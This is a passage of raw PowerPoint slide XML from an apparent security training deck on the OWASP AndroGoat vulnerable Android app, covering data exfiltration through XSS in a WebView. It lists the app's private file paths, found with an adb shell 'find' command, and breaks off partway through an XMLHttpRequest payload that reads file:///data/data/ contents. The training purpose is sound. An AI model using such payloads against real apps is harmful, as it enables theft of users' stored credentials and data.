              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>clearly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the source file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>loaded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> locations for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/data/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>app_webdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>xss.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/mnt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>xss_ext.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the application has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>had</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>discussed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>earlier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>webview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> has as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>much</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> as the application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Data Exfiltration via XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Figuring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> out File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Paths</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data, first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to know the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> of the files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</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495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Data Exfiltration via XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> App Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to the phone, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to the phone and run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>adb</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shell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@emulator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/ # cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/data/data/</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owasp.sat.agoat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@emulator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/data/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</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shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> _</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prefs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</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users.xml</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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shared_prefs</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WebViewChromiumPrefs.xml</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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databases</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./</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databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aGoat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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databases</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aGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-journal</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3996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Data Exfiltration via XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> App Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"GET"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"file:///data/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
